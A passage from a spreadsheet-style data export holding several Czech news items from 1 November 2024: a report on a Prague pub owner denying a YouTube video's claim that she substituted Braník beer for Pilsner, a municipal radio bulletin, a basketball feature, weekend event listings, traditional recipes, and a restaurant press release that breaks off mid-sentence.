    <t>Že falšujeme plzeňské pivo Braníkem z PETky? Lež, brání se hostinská z Prahy Když se během posledního říjnového víkendu objevila na platformě YouTube nahrávka z Radnických schodů nazvaná „Jak se podvádí v pražské hospodě s pivem “, v němž reportér Janek Rubeš a jeho tým řeší podezření na falšování plzeňského piva PETkovým Braníkem , setkala se s obrovským ohlasem. Od zveřejnění v neděli 27. října do odpoledne 31. října nasbírala sedm set tisíc zhlédnutí, přičemž každou minutou přibývala další. | Video: Youtube Provozovatelka Mistic-Café Yvetta Procházková Deníku umožnila nahlédnout do provozovny, kde Kluci z Prahy natáčeli 3. září. Braník z PETky podnik skutečně nabízí - aktuálně půl litru za 110 korun a litr za 185 korun, ale pod jeho vlastním jménem. Točený Pilsner Urquell je pak k dostání za stejnou cenu. Žena ale odmítá, že by se s pivem čachrovalo - k čemuž vzhledem k tomu, že ceny jsou shodné, ani není důvod. Ekonomika Jako čepované pivo podnik nabízí pouze Pilsner Urqell. Další pípa by se podle provozovatelky restaurace do stísněných prostor „kuchyňky“ nevešla, pokud má ještě zůstat k dispozici plocha na přípravu nápojů. Plzeň je tedy většinou k mání čepovaná. Pro případ, že dojde, jsou k mání ještě zásoby v plechu. Procházková zároveň nepopírá, že Braník jí z Makra dovážejí v plastových PETkách. Což údajně vůbec nemá vliv na to, jak je žádaný. Hlavně turistům z Polska prý jeho chuť vyhovuje - a prakticky jiné pivo nechtějí. Kauza poškozuje rodinu Restauratérka Deníku řekla, že vzhledem k ohlasu aktuální kauzy se bude snažit udělat vše pro to, aby očistila své jméno. Od středy je v kontaktu s právníkem, s nímž probírá další postup. Současně však odmítá vystoupit před kamerou i se nechat vyfotit. „Už jsem byla natáčená dost“, posteskla si. „Dělám to pro moje kluky,“ vysvětlila, proč se chce zbavit cejchu, který na ní ulpěl. Dodává, že na ní nesejde, ale záleží jí na tom, aby se za to, co se o ní povídá, nemuseli stydět chlapci, o něž pečuje. Soudem má do péče svěřeny dva hochy. Ekonomika Hlas pětašedesátileté provozovatelky restaurace, která na místě působí už dvacet let, zakolísal i ve chvíli, kdy s hrdostí ukazovala všudypřítomné dečky, jež si návštěvníci restaurace často fotí. „Naučila mě to maminka,“ řekla - načež se musela na chvíli odmlčet. Poté přiblížila, jak se dekorace musejí nejen opatrně prát a žehlit, ale i škrobit. Což o tom, jaký má k podniku vztah, vypovědělo možná i víc než vyprávění, jak neváhá zaskočit v kuchyni, nebo i umývat záchody. „Dělám pouze svou práci - a za tím si stojím,“ konstatovala s tím, že v podnikání jsou karty rozdány jasně: snažit se co nejlevněji nakoupit a co nejdráž prodat. Trvá nicméně na tom, že ji uráží, pokud má být hozena do jednoho pytle třeba s takzvanými ruličkáři, jejichž praktikám se Rubeš věnoval v minulosti, a zdůrazňuje: „Moje podnikání je legální. A nic neskrývám.“ Zaměstnankyně Kristina hodnotí poměry v restauraci Mistic-Café na Hradčanech | Video: Deník/ Milan Holakovský Deník měl možnost hovořit i se zástupcem plzeňského pivovaru , jenž ve čtvrtek přijel na kontrolu. Mluvit pod svým jménem nechtěl s tím, že oprávnění poskytovat za pivovar vyjádření má pouze tiskový mluvčí. Potvrdil však, že jeho neočekávaný příjezd souvisí se zveřejněným videem. „Za nás je tady všechno v pořádku,“ konstatoval. A poznamenal, že hostinskou Procházkovou zná „x let“ - a ve vztahu k dodavateli piva s ní nikdy nebyl sebemenší problém. Jak je to s pivem ze sudu? Redaktor Deníku zavítal také do sklepa. Ten aktuálně ukrýval dva pivní sudy, takže se prý někdy stane, že točená plzeň dojde. To se mělo přihodit zrovna v den natáčení Kluků z Prahy . I tak ale údajně Rubešův figurant dostal piva , o která měl zájem - a jež se také objevila na účtence. Co se tehdy odehrálo, přiblížila pro Deník servírka Táňa: „Přišel pán, já se zeptala, jestli chce pivo , on řekl ‚jo‘. Já se zeptala: ‚Malé, nebo velké?‘ On řekl, že chce velké pivo ; já mu přinesla litr.“ Procházková doplnila, že v nápojovém lístku nejsou zmíněny třetinky. Ceny jsou uvedeny za půl litru a za litr, což podle ní jasně definuje, co se tu rozumí jako pivo „malé“ a „velké“ . A nehraje roli, jak to vnímají jinde, nebo zda litrovou sklenici Němci označují jako „tuplák“. Servírka Táňa popisuje, jak vnímala natáčení Kluků z Prahy v restauraci Mistic-Café | Video: Deník/ Milan Holakovský „Dostal Braník , neřekl (jaké pivo chce, pozn. red.),“ poznamenala Táňa. „Pak chtěl ještě půl litru plzně - tak dostal. A to je všechno,“ uzavřela servírka. Ve sklepě Procházková Deník upozornila i na čerstvé nástrahy proti hlodavcům. Připomněla tím malér z roku 2020, kdy podnik nakrátko uzavřeli kontroloři s odkazem na zanedbaný úklid i s výskytem trusu hlodavců. To byl podle jejích slov problém s chováním tehdejšího personálu, jenž prý rezignoval na úklid, když sama byla plně zaneprázdněna ukončováním provozu dalších restaurací, které také v centru Prahy vedla. Dřívější prohřešky Žena netají, že stejně jako u konkurentů se za dvacet let podnikání „nějaké škraloupy našly“ - a jako provozovatelka odpovídá i za to, co se stalo, i když na místě nebyla. Nezastírá ani dvě dřívější pokuty uložené poté, co se ukázalo, že si servírka svévolně přiúčtovala procenta za obsluhu či kuchařka nalévající becherovky sice jednu „přelila“, ale druhou „nedolila“. „Tohle, co se děje, si ale opravdu nezasloužím. Já se nemám za co stydět,“ míní. Ekonomika Jestliže Procházková neváhala Deníku ukázat prostory podniku i s pivními sudy a dokumentaci k výčepnímu zařízení, proč to neudělala i pří natáčení Kluků z Prahy ? „Byla jsem v šoku z toho, co se děje – a asi deset minut jsem vůbec nevěděla, jak se mám zachovat,“ uzavřela s tím, že až s odstupem ji napadlo, že jediné správné řešení bylo volat policii. Autor: Milan Holakovský Autor Milan Holakovský</t>
  </si>
  <si>
    <t>719760</t>
  </si>
  <si>
    <t>731150</t>
  </si>
  <si>
    <t>20241101_176_3244313101_9c196875d613bdc09cd3.html</t>
  </si>
  <si>
    <t>9c196875d613bdc09cd3</t>
  </si>
  <si>
    <t>Hlášení rozhlasu ze dne 1.11.2024 odpoledne</t>
  </si>
  <si>
    <t>Hlášení rozhlasu ze dne 1.11.2024 odpoledne EG.D, a.s.oznamuje občanům, že z důvodu plánovaných prací na zařízení distribuční soustavy bude přerušena dodávka elektrické energie v pondělí 04.11.2024 v době od 7:30 do 13:30 hod. na těchto odběrných místech: Na Bělince čp. 1492, Obchodní, Panská čp. 1140 a čp.23, Potočná, V Pastouškách, Ve Strhanci, Zahrady, a třída Vítězství. Konkrétní čísla popisná, kterých se odstávka elektrické energie týká naleznete na webových stránkách města Kunovice . Děkujeme za pochopení. Společnost EPS biotechnology Vás srdečně zve v pátek 01.11.2024 v 18:00 hod. na další cyklus degustací vína . Ochutnáte 8 vzorků vín a dozvíte se vše o výrobě vína od našeho vinaře pana Píšťka. Těšíme se na viděnou ve vinném sklepě u pivovaru ROTOR. Knihovna Fanka Jilíka v Kunovicích pořádá ve čtvrtek 07. 11.2024 od 17:00 hodin čtenářskou besedu spojenou s autorským čtením z knihy divadelního režiséra, básníka a spisovatele Jana Antonína Pitínského s názvem Domácí potřeby. Své písně během besedy zazpívá Miroslav Černý . Akce se koná v prostorách knihovny, vstup je volný. Knihy a časopisy vyřazené z fondu Knihovny Fanka Jilíka nakoupíte za symbolické ceny na letošním posledním knižním bazaru, který se koná v sobotu 09.11.2024 v době od 9:00 do 13:00 hodin. v přednáškovém sálu Panského dvora. Příznivce házené zveme v sobotu 02.11.2024 do Sportovní haly v Kunovicích na utkání starších a mladších žaček a žen. Začátek utkání je v 9:00, v 10:25, 11:50, 14:00 a v 16:00 hod. se soupeři HK Bystřice pod Hostýnem , DHK Zora Olomouc , SK Žeravice a Sokol Vršovice A. Těšíme se na Vaši účast Vytvořeno / změněno: 1.11.2024 / 1.11.2024</t>
  </si>
  <si>
    <t>73</t>
  </si>
  <si>
    <t>463</t>
  </si>
  <si>
    <t>20241101_177_3244231732_40c03441c98a49593462.html</t>
  </si>
  <si>
    <t>40c03441c98a49593462</t>
  </si>
  <si>
    <t>Jihočeský basketbalový zázrak? Písečtí Sršni nepotřebují cizince, i tak vládnou lize</t>
  </si>
  <si>
    <t>Jihočeský basketbalový zázrak? Písečtí Sršni nepotřebují cizince, i tak vládnou lize Tomáš Rambousek Basketbalisté Písku děkují fanouškům za podporu po utkání s Pardubicemi . Sršni Písek / Photomate Třicetitisícové jihočeské městečko Písek žije senzačním příběhem basketbalových Sršňů. Tým, který se prokousal do nejvyšší české soutěže poprvé teprve loni, aktuálně vede po 10 kolech tabulku NBL. Zatím padl jen v jediném utkání. Cesta je ale teprve na začátku. Možná právě nyní, v hale u nejstaršího kamenného mostu v Česku, se začíná psát důležitá kapitola jedné velké české sportovní pohádky. Stařičká písecká hala se kvůli návštěvám nejlepších českých basketbalových týmů musela dát trochu do pucu. Na malé tribuně se v nové sezoně pokaždé tísní minimálně 700 diváků. Koneckonců, proč by nechodili. Basket, který Sršni hrají, je energický, dravý, přímočarý. Zatím až na jedinou výjimku, kterou byl zápas s ostřílenou Opavou ( 86:97 ), se vyhrává… Při poslední triumfu nad Pardubicemi ( 76:75 ) hala málem spadla. Rozhodující trefu totiž zařídil power-forvard Jan Karlovský se zvukem klaksonu. "Vlastně jsem tomu moc nevěřil, ale padlo to tam. Ten závěrečný koš mohl dát úplně kdokoliv. Jsme mladí a hladoví a tohle je snový začátek sezony. Ve městě je neskutečná euforie, fanoušci jsou úžasní a zaslouží si to," rozplýval se po "buzzer-beateru" 201 centimetrů vysoký dlouhán, který se do Písku přesunul ze severu Čech . Sršni potvrdili, že se s nimi musí počítat a ukázali, že cesta, jakou se vydali, může být úspěšná. Začaly to reflektovat i sázkové kanceláře. Na vítězství loňského outsidera nad tradičně silnými Pardubicemi byl vypsán kurz 1,3 ku jedné! Jan Karlovský Sršni Písek / Photomate "Za mě je šílené, že jsme v utkání proti týmu se zhruba pětinásobným rozpočtem byli považováni za jasného favorita. Šílené se mi zdá i to, že se z naší stařičké a maličké haly dal realizovat přímý přenos České televize, který mimochodem vypadal velmi dobře. A je za mě šílené, že jsme se vrátili na první místo v NBL," glosoval ve zpravodaji médiím Miroslav Janovský, zakladatel píseckého basketbalového klubu. Historie klubu opravdu není tak dlouhá, vlastně jen tři dekády a právě tento basketbalový fanatik stál u zrodu dnes úspěšného klubu: "Ve školním roce 1995/96 začínající učitel Janovský soustředil v jedné třídě talentované kluky a k trénování přemluvil bývalého basketbalistu a tatínka dvou kluků Dalibora Peška . A první basketbalové mužstvo Sršňů bylo na světě," potvrzuje klubová kronika. Mládí a dva veteráni O necelých 30 let později hraje Písek nejvyšší soutěž. Ba co víc, válcuje ji. Zatímco všechny zbývající týmy elitní české soutěže mají na soupisce minimálně jednoho cizince, ale zpravidla víc, v Písku nenajdete jediného. Prim hrají odchovanci klubu, kteří pomalu dorůstají do ideálního věku. V základní rotaci hráčů najdete sebevědomé basketbalisty ve věku 23-25 let, starší v kádru až na dvě výjimky nejsou. Tou první je dnes devětadvacetiletý patriot Petr Šlechta, který ještě před pár lety tvrdil, že ho už nikdo nepřesvědčí, aby se vrátil do nejvyšší soutěže. Tehdy končil v Jindřichově Hradci , vrátil se domů, kde pomáhal s trénováním mladých nadějí a pracovně objížděl republiku, neboť ho začalo živit odvětví hospodářské úpravy lesů. "Hraju fakt jen pro radost, ale kdybychom postoupili, asi bych to přehodnotil," vyprávěl výjimečný střelec v roce 2019 pro iDnes. Petr Šlechta po utkání v Opavě . Sršni Písek / Photomate Ale protože loni přišla událost, díky které je teď týden co týden Písek na nohou, obul zase lesák Šlechta prvoligové boty. To si přece nemohl nechat ujít. Zároveň tým jeho zkušenosti a body potřeboval. A kdyby bylo nejhůř, je prý pořád připravený i jednačtyřicetiletý matador Pavel Englický , který se vrátil domů před sedmi lety a týmu zelenáčů pomáhal k postupu i v premiérové ligové sezoně. V té aktuální ale ještě na palubovce nebyl ani vteřinu. Dravé mládí totiž přebírá zodpovědnost. Mezi koši válí Martin Svoboda , důležité role dostali Kevin Týml, který do Písku dorazil z Ostravy , také Matěj Burda , jenž naposledy působil v Pardubicích a i již zmíněný Jan Karlovský. Porady u piva A pak je tu kouč Jan Čech a jeho prodloužená ruka na palubovce – rozehrávač Vojtěch Sýkora . V jednom z rozhovorů mladík připustil, že s trenérem chodí vždy na jedno pivo a rozebírají nové prvky a trendy. Mimochodem, právě Čecha loni vyhlásili nejlepším českým basketbalovým trenérem. "Mojí filozofií je rychlá, agresivní hra, celoplošná obrana nebo střídání obran, trojková střelba a práce s mladými hráči," vyprávěl písecký trenér po převzetí ceny. V Písku se může realizovat. Trenér Jan Čech a Vojtěch Sýkora (10) Sršni Písek / Photomate A Sýkora ? Rozehrávač i křídlo, mozek hry, ale také výjimečný šachista a budoucí advokát. V pouhých 23 letech klíčová osobnost a zároveň kluk, který ještě část svého basketbalového dospívání strávil s dalším jihočeským patriotem Vítem Krejčím , dnes jediným Čechem v NBA . Ještě než jeho vrstevník právě z píseckého klubu vyrazil do španělské Zaragozy , zahráli si společně jako čtrnáctiletí kluci (a i s dalším členem současných Sršňů Štěpánem Borovkou ) v roce 2015 už na Olympiádě dětí a mládeže. I díky Krejčího cestě do nejlepší ligy světa mají písečtí basketbalisté motivaci dřít a nevzdávat se snů. Dalším tvrdým testem jejich odolnosti bude sobotní zápas v Nymburce , tedy na půdě účastníka Ligy mistrů a nejlepšího českého klubu posledních let. Euforie a pozitivní energie je ze sršního hnízda cítit na hony daleko. "Rozhodně tam nepojedeme jako předem poražení. Chceme vyhrát i v Nymburce , nebudu lhát," přiznal Karlovský. Sobotní šlágr basketbalové Kooperativa NBL mezi Nymburkem a Sršni Písek začne v 15 hodin.</t>
  </si>
  <si>
    <t>309000</t>
  </si>
  <si>
    <t>270990</t>
  </si>
  <si>
    <t>20241101_178_3244209507_fc1e14b0475697ac7bb8.html</t>
  </si>
  <si>
    <t>fc1e14b0475697ac7bb8</t>
  </si>
  <si>
    <t>Víkend začíná: Dvanáct tipů Deníku, kam vyrazit za zábavou na Mělnicku</t>
  </si>
  <si>
    <t>Víkend začíná: Dvanáct tipů Deníku, kam vyrazit za zábavou na Mělnicku MĚLNICKO Dýňování a stezka odvahy Kdy: sobota 2. listopadu od 17.00 Kde: Mšeno , sraz na náměstí Za kolik: neuvedeno Dýňování ve Mšeně , na stezku odvahy se vyráží od 18.00, dýně a lampiony k případnému zakoupení na místě. Happy halloween Kdy: sobota 2. listopadu od 14.00 Kde: Vojkovice , sraz před hasičárnou Za kolik: neuvedeno Halloweenské tvoření a dlabání dýní, od 16.00 hodin stezka odvahy, od 18.00 hodin lampionový průvod – prvních padesát dětí dostane lampion. Mělnicko Divadelní festival Kdy: sobota 2. listopadu od 14.30 Kde: Kralupy nad Vltavou , klubovna Scény, kulturní dům Za kolik: pohádky 80 korun, děti do 3 let a dospělí zdarma, večerní představení 130 korun Scénafest 2024: od 14.30 pohádka pro děti od Damúzy Bosí rytíři (klubovna), od 16.15 Vitamínová pohádka pro děti od Jakuba Pilaře (klubovna), od 19.00 Úplněnahé Divadlo - Burgermeister náš (klubovna), od 21.00 V.A.D. Kladno - Nikoločava Nenecxhte si ujít (kulturní dům). Strašidelný průvod Kdy: sobota 2. listopadu od 17.00 Kde: Kokořín , sraz na hřišti mezi bytovkami Za kolik: neuvedeno Dobrovolní hasiči pořádají strašidelný halloweenský průvod, cíl je na Kokořínku, kde bude i táborák. Kostýmy vítány, lampiony s sebou. Cirkus bude! Kdy: sobota 2. a neděle 3. listopadu od 15.00 Kde: Mělník , u City centra v Bezručově ulici Za kolik: neuvedeno Cirkusové představení ve vytápěném stanu, akrobati, kouzelník, fakír, žongléři, klauni. Maškarní karneval a zábava Kdy: sobota 2. listopadu od 15.00, od 20.00 Kde: Kadlín , obecní hospoda Za kolik: neuvedeno Odpolední maškarní karneval pro děti, kam dorazí i kouzelník. Večerní taneční zábava pro dospělé, hraje Kabát kontraband. play_fill Mělnicko Halloweenská stezka Kdy: sobota 2. listopadu od 17.45 Kde: Kojetice , hřiště Za kolik: neuvedeno Halloweenská stezka pro odvážné děti v doprovodu rodičů, na které se budou plnit úkoly. Masky vítány, baterky nebo lampiony s sebou. Víno a muzika Kdy: sobota 2. listopadu od 19.00 Kde: Kostelec nad Labem , infocentrum Za kolik: 100 korun Košt v Kostelci nad Labem , vína z vinařství Konečný a k tomu kapela Jazz Apples. Halloweenská stezka Kdy: sobota 2. listopadu od 17.00 Kde: Tupadly , sraz v parku Za kolik: neuvedeno Halloweenská stezka, start je v parku za obecním úřadem, v 17.00 zahájení pro malé děti, v 18.00 pro odvážné. Lampionový průvod Kdy: sobota 2. listopadu od 17.30 Kde: Kly, sraz u školy Za kolik: neuvedeno U školy budou na děti čekat stanoviště s úkoly, v 18.15 hodin vyrazí průvod na cestu vesnicí s cílem na školním hřišti, kde bude halloweenská diskotéka a společné opékání špekáčků. Dýňobraní v Chorušicích Kdy: sobota 2. listopadu od 14.00 Kde: Chorušice, náves Za kolik: neuvedeno Na návsi před hospůdkou, dlabání dýní, stezka odvahy, podzimní tvoření, malování na obličej, diskotéka, dýňové dobroty, vyhlášení nejhezčí dýně. Halloweenské odpoledne Kdy: sobota 2. listopadu od 14.00 Kde: Kostelec nad Labem , Zmrzlinárna 89 Za kolik: neuvedeno Halloweenské odpoledne, speciální zmrzliny, stezka odvahy, tvoření, malování na obličej. STŘEDNÍ ČECHY Festival kostek Kdy: sobota 2. a neděle 3. listopadu od 9.00 Kde: Mladá Boleslav , sokolovna Za kolik: neuvedeno Přes milion kostek a tisíce figurek, herní koutky včetně Duplo koutku pro ty nejmenší, i herní zóny, funkční model Lego festivalu, obří historické i moderní stavby, obrazové mozaiky, vesnice, diorama z oblíbených filmových sérií (Harry Potter, Pán prstenů, Simpsonovi) a spousta dalších zajímavých modelů. Součástí je doprovodný program se soutěžemi o Lego ceny. Světelný park na Nováku Kdy: sobota 2. listopadu od 16.00 Kde: Příbram , areál Nový rybník Za kolik: dospělý 245, snížené vstupné 170, rodinné 690 korun Slavnostní zahájení výstavy Světelný vodní svět, která bude probíhat až do 12. ledna 2025. Na návštěvníky čekají nádherné světelné sochy a dekorace z desítek tisíc LED světel, rozsvěcující plochy i cesty areálu každý den od 16 do 21 hodin. gallery 42 fotografií Lampionový průvod Kdy: sobota 2. listopadu od 15.00 Kde: Dobříš , zámecký park Za kolik: neuvedeno Lampionový průvod pohádkovým lesem v malebném prostředí anglického parku zámku Dobříš . Na cestě čekají pohádkové postavy a tajemná dobrodružství na malé i velké. Lampiony s sebou. Taneční soutěž Kdy: sobota 2. listopadu od 8.30 Kde: Beroun , kulturní dům Plzeňka Za kolik: 150 korun, děti do 6 let a ZTP zdarma Celorepubliková soutěž v tanečním sportu - standardní a latinskoamerické tance ve věkových kategoriích od dětí přes juniory po dospělé Pánem jeskyně pro začátečníky Kdy: sobota 2. listopadu od 13.00 Kde: Beroun , městská knihovna Za kolik: neuvedeno Vstupní workshop pro všechny zájemce o hry na hrdiny, kteří by si chtěli zkusit připravit své první dobrodružství. Workshop povede Karel Kolmann – herní designér z Warhorse Studios a jeden z autorů Kingdom Come: Deliverance a Kingdom Come: Deliverance 2, kterého k tvorbě počítačových her dovedla mimo jiné právě příprava dobrodružství a příběhů pro Dračí doupě. Mělnicko Charitativní festival Kdy: sobota 2. listopadu od 14.00 Kde: Kladno , kino Sokol Za kolik: 250 korun Charitativní hudební festival a sbírku na povodní poničenou obec Hynčice . Hrají kapely Kudy Kam, Hluchavky, Dobrý Struny, Fr. Nedvěd ml., Kupa a Gladly S.W. . Těšit se můžete také na vystoupení taneční skupiny Zářící ženy. Všichni se na festivalu podílí bez nároku na honorář. Mozartovo Requiem Kdy: sobota 2. listopadu od 19.00 Kde: Kolín , chrám sv. Bartoloměje Za kolik: neuvedeno Requiem od W. A. Mozarta zazní v chrámu sv. Bartoloměje v Kolíně . Slavné dílo jednoho z největších hudebních skladatelů všech dob si publikum vyslechne v podání Cantores Cantant a hostů. Autor: Petra Špitálská Autor Petra Špitálská</t>
  </si>
  <si>
    <t>6740</t>
  </si>
  <si>
    <t>2800</t>
  </si>
  <si>
    <t>20241101_179_3244260703_671a7bce093c2c6dff3a.html</t>
  </si>
  <si>
    <t>671a7bce093c2c6dff3a</t>
  </si>
  <si>
    <t>Z KUCHYNĚ NAŠICH BABIČEK</t>
  </si>
  <si>
    <t>Z KUCHYNĚ NAŠICH BABIČEK MÍCHANÁ CHLEBOVÁ POLÉVKA 4 krajíce chleba, 1 cibule, 30 g másla, 1 malá kapusta, ½ malého celeru, 1 mrkev, 1 ½ l vody nebo vývaru z kostí, 100 g uzené klobásy, 4 sázená vejce, pažitka Chleba a cibuli nakrájíme na kostičky a osmahneme na másle dozlatova. Očištěnou zeleninu nakrájíme na nudličky, zalijeme vývarem nebo vodou s masoxem. Osolíme a povaříme, až je zelenina měkká. Do talířů dáme na dno cibuli s chlebem, na to doprostřed položíme pečené sázené vejce, kousek klobásy, kolem narovnáme zeleninu z polévky a vše přelijeme horkou polévkou. PIKANTNÍ DUŠENÉ HOVĚZÍ MASO ¾ kg hovězího masa z kýty, sůl. 50 g slaniny, 50 g másla, 1 cibule, 1 petržel, kousek celeru, 6 zrnek pepře, kousek zázvoru, 30 g hladké mouky 1/8 l červeného vína , 1 lžíce kaparů, 20 g másla, 3 sardele (nebo sardelovou pastu) Maso osolíme a protýkáme nudličkami slaniny. Na kastrol dáme máslo, osmahneme na něm pokrájenou zeleninu a maso, které ze všech stran také osmahneme. Pak podlijeme trochu vývarem nebo vodou, přidáme koření, přikryjeme poklicí a dusíme, až je maso měkké. Pak ho vyndáme, šťávu vydusíme až na tuk, zaprášíme moukou, osmahneme dozlatova, rozředíme a povaříme, omáčku propasírujeme, zředíme vínem , přidáme kapary a kousek másla utřený se sardelkami nebo trochu sardelové pasty, a ještě krátce povaříme. Je-li omáčka hustá, zředíme ji vodou. Podáváme s vařeným bramborem nebo noky. KUŘE V RÝŽI 1 kuře, sůl, 250 g rýže, 40 g másla, ½ l vývaru z kuřete, 2 žloutky, muškátový květ Kuře rozpůlíme a povaříme v osolené vodě doměkka. Rýži propláchneme, dáme na kastrol na máslo a trochu ji osmahneme. Zalijeme vývarem z kuřete a pozvolna dusíme pod pokličkou. Když je rýže měkká, vmícháme do ní 2 žloutky, máslo a špetku muškátového květu rozmíchaného v trošce vývaru. Prohřáté kuře rozdělané na porce urovnáme doprostřed mísy a kolem dokola uděláme věnec z rýže. Jak obměnu pokrmu kuře můžeme dát do zapékací misky, poklademe rýží, posypeme strouhaným sýrem a zapečeme. Místo rýže lze použít i nudle či jiné těstoviny. NĚMECKÉ KOLÁČE 140 g másla, 4 žloutky, sůl, 100 g cukru, citronová kůra, 30 g droždí, 500 g polohrubé mouky, mléko dle potřeby Máslo utřeme se žloutky, přidáme špetku soli, cukr a citronovou kůru. Pak přidáme vykynutý kvásek a po částech přidáváme mouku a mléko dle potřeby. Vypracujeme vláčné těsto a necháme vykynout. Na dobře vymazaný plech nebo do koláčové formy děláme kulaté koláče, okraje potřeme rozkloktaným vejcem, náplň zvolíme dle chuti (tvaroh, mák, povidla). Pečeme ve vyhřáté troubě. DOMÁCÍ PUNČ 500 g cukru, 6 citronů, 4 g čaje, 1 pomeranč, 2 l vařící vody, 4 dcl dobrého rumu nebo araku Cukr dáme do mísy postavené ve vodní lázni spolu s kůrou ze dvou citronů a pomeranče a šťávou z 6 citronů a 1 pomeranče. Čaj spaříme vařící vodou a horkou tekutinu procedíme na cukr se šťávou. Nakonec přidáme rum nebo arak. Podáváme horké.</t>
  </si>
  <si>
    <t>20241101_18_3246867273_4ff27964d3be0a5d55c2.html</t>
  </si>
  <si>
    <t>4ff27964d3be0a5d55c2</t>
  </si>
  <si>
    <t>Japonsko zpřísnilo tresty pro cyklisty s&amp;nbsp;telefonem v&amp;nbsp;ruce nebo alkoholem v&amp;nbsp;krvi....</t>
  </si>
  <si>
    <t>Japonsko zpřísnilo tresty pro cyklisty s&amp;nbsp;telefonem v&amp;nbsp;ruce nebo alkoholem v&amp;nbsp;krvi.... Japonsko zpřísnilo tresty pro cyklisty s telefonem v ruce nebo alkoholem v krvi. Maximální pokuta bude nyní činit v přepočtu téměř 152 tisíc korun a maximální trest odnětí svobody pět let. Dříve bylo používání mobilního telefonu při jízdě na kole trestáno podle pravidel stanovených místními komisemi pro veřejnou bezpečnost, přičemž provinilcům hrozila pokuta až 7500 korun. (Kyodo)</t>
  </si>
  <si>
    <t>20241101_180_3244181508_dd736df20f1c90175a95.html</t>
  </si>
  <si>
    <t>dd736df20f1c90175a95</t>
  </si>
  <si>
    <t>Podzimní husí hody v restauracích skupiny Pytloun Restaurants v kouzelném prostředí Krkonoš a Krušných hor, v zámecké restauraci na okraji Prahy nebo v srdci Liberce</t>
  </si>
  <si>
    <t>Shrnutí Podzimní husí hody v restauracích skupiny Pytloun Restaurants v kouzelném prostředí Krkonoš a Krušných hor , v zámecké restauraci na okraji Prahy nebo v srdci Liberce Harrachov ( Krkonoše )/ Hasištejn ( Krušné hory )/ Praha – Vinoř (Ctěnice)/ Liberec , 1. listopadu 2024 – Čerstvě zrekonstruovaná a rozšířená restaurace Končina v malebném horském městečku Harrachov v Krkonoších , romantická zámecká restaurace Chateau Ctěnice v Zámeckém areálu Ctěnice na severovýchodní hranici Prahy , restaurace Rendlík, nacházející se uprostřed lesů vedle kouzelné zříceniny hradu Hasištejn v Krušných horách a stylová restaurace Zlatý kohout v Liberci v ikonickém hotelu Imperial , nabídnou svým hostům od 1. do 30. listopadu tradiční podzimní husí speciality připravené z hus pocházejících z drůbeží farmy Holýšov . Husí menu, sestavené v restauracích Končina, Chateau Ctěnice a Rendlík zkušeným šéfkuchařem Denisem Wágnerem, a v restauraci Zlatý kohout šéfkuchařem Janem Martínkem, bude ve všech čtyřech restauracích, které jsou součástí skupiny PYTLOUN RESTAURANTS, k dispozici každý den od 12:00 do 21:00 hodin. „Zahřejte se výtečným husím kaldounem s játrovými knedlíčky a domácími nudlemi a pokračujte hlavním chodem – staročeskými bramborovými lokšemi plněnými trhaným husím masem, doplněnými červeným zelím a povidlovou omáčkou. K dokonalému zážitku přispěje i naše speciální nabídka nápojů – vyzkoušejte suché moravské víno Cabernet Moravia z malého rodinného vinařství Filiberk v Kobylí nebo podzimní koktejl Autumn Fizz. Přijďte ochutnat lahodné husí menu, které jsme připravili s důrazem na poctivé suroviny a klasické recepty. Těšíme se na vaši návštěvu ať už v našich horských restauracích v Krkonoších či Krušných horách , v prostředí historického zámku na okraji Prahy nebo v designové restauraci v srdci Liberce ,“ říká šéfkuchař Denis Wágner. Restaurace Končina, která je součástí Pytloun Wellness Hotelu Harrachov (Rýžoviště 489), je místem, které spojuje vynikající gastronomické zážitky s pohodovou horskou atmosférou v srdci Krkonoš . V menu najdete pestrou paletu pokrmů od tradičních českých specialit až po jídla inspirovaná kuchyněmi z různých koutů světa. Šéfkuchař restaurace Denis Wágner klade důraz na čerstvé a kvalitní suroviny, které jsou základem všech pokrmů. Hosté si mohou pochutnat na šťavnatých steacích, delikátních mořských plodech, ale také na lehkých salátech nebo výtečných těstovinách. Nabídka se pravidelně obměňuje, aby odrážela sezónní suroviny a novinky z kulinářského světa. Interiér restaurace Končina je útulný, s příjemným horským nádechem, který zve k odpočinku po dni stráveném na sjezdovkách nebo turistických trasách. Ať už hledáte místo pro rodinný oběd, romantickou večeři, nebo jen odpočinek u dobré kávy po náročném dni, restaurace Končina je ideální volbou. Restaurace Chateau Ctěnice (Bohdanečská 259, Praha - Vinoř ) nabízí 40 míst k sezení v příjemném prostředí moderní zámecké restaurace. Cihlové klenuté stropy, hrubý štuk a těžká dlažba dodávají interiéru autentický vzhled. Restaurace se zaměřuje na klasiku s důrazem na čerstvé suroviny od lokálních dodavatelů. Venkovní terasa umožňuje vychutnat si gastronomické speciality, kávu, pivo či osvěžující drinky s výhledem na zámecké nádvoří, což je ideální pro odpočinek a prožití klidné atmosféry ctěnického panství. Liberecká restaurace Zlatý kohout s italskou kuchyní je známá svým fine dining konceptem, ve kterém využívá vysoce kvalitní suroviny, sofistikovanou prezentaci jídel a vynikající chuťové kombinace. Jedním z unikátních prvků restaurace je otevřená kuchyně, která umožňuje hostům sledovat šéfkuchaře a jeho tým při přípravě pokrmů. To vytváří interaktivní a zábavnou atmosféru, která přidává další rozměr nezapomenutelnému zážitku z návštěvy restaurace. Historie restaurace sahá až do 30. let minulého století, kdy byl hotel Imperial (dnešní Pytloun Grand Hotel Imperial ) postaven podle projektu Pavla Zeha hoteliérem Franzem Fiedlerem . Z této doby se příliš záznamů nedochovalo. Jisté je, že po dlouhé stagnaci v době hospodářské krize a zejména za druhé světové války se hotel probudil k životu v průběhu 50. a 60. let. V 80. letech se v prostoru dnešní restaurace nacházel populární snack bar Zlatý kohout. V roce 2015 získal hotel spolu s restaurací nynější podobu. Té vtiskli její nadčasově designovou podobu renomovaní architekti Vrtiška &amp;amp; Žák. V restauraci Rendlík, která je součástí Pytloun Wellness Hotelu Hasištejn v Krušných horách (na okraji obce Místo v okrese Chomutov ), se moderní kuchyně snoubí s tradičními hodnotami, což vytváří jedinečný gastronomický zážitek. Restaurace je skrytá uprostřed lesů a sousedí s kouzelnou zříceninou hradu Hasištejn , takže na hosty, kteří si přejí vychutnat své jídlo na velké letní terase s výhledem do okolních lesů, čekají nezapomenutelné romantické výhledy. Restaurace, která disponuje 45 místy k sezení, klade důraz na kvalitní suroviny od místních farmářů, a kromě sezonních specialit nabízí i osvědčené klasiky. Je také vhodná pro firemní jednání, školení a privátní oslavy, jako jsou svatební hostiny a narozeninové oslavy. Husy v české kuchyni Husy mají v české kuchyni dlouhou tradici a jsou oblíbeným pokrmem zejména při slavnostních příležitostech, jako jsou Svatomartinské 